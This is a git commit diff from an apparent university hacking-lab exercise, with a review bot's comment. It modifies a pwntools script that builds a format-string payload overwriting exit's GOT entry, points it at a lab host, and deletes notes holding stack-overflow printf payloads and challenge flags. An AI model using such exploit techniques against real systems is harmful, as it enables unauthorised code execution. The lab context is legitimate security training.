2026-02-02 16:05:13 +01:00
parent 71feaaad5a
commit e7a9ea4c8d
2 changed files with 4 additions and 9 deletions


@@ -15,8 +15,10 @@ print("win : ", hex(win_addr))
#for i in range(1,30): #for i in range(1,30):
#print("##################### ", i) #print("##################### ", i)
p = process(elf.path) #p = process(elf.path)
#p = remote("localhost", 4010) p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
p.sendline(payload.encode())
context.clear(arch = 'amd64') context.clear(arch = 'amd64')
payload = fmtstr_payload(offset=8, writes={exit_got: win_addr}) payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
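Review bot: The new `payload = "hacklab{...}"` line puts the previous stage's flag into the repository as a string literal, where it stays readable in history even if a later commit removes it. The same applies to the flag inside the notes file this commit deletes. Read it at run time instead, for example `payload = os.environ["PREV_FLAG"]` (a placeholder variable name, and it needs `import os` at the top of the script, which is outside this hunk). The target is also switched by commenting lines in and out, which makes it easy to commit the script pointing at the shared host by accident. If the script uses `from pwn import *`, which this hunk does not show, a single line such as `p = remote(HOST, 4010) if args.REMOTE else process(elf.path)` keeps local as the default and makes the remote run an explicit choice.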


@@ -1,7 +0,0 @@
last key
32 byte filler
overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
overwrite rip with address of win
#printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x56\x13\x40\00\00\00\00\00\ncat flag.txt\n'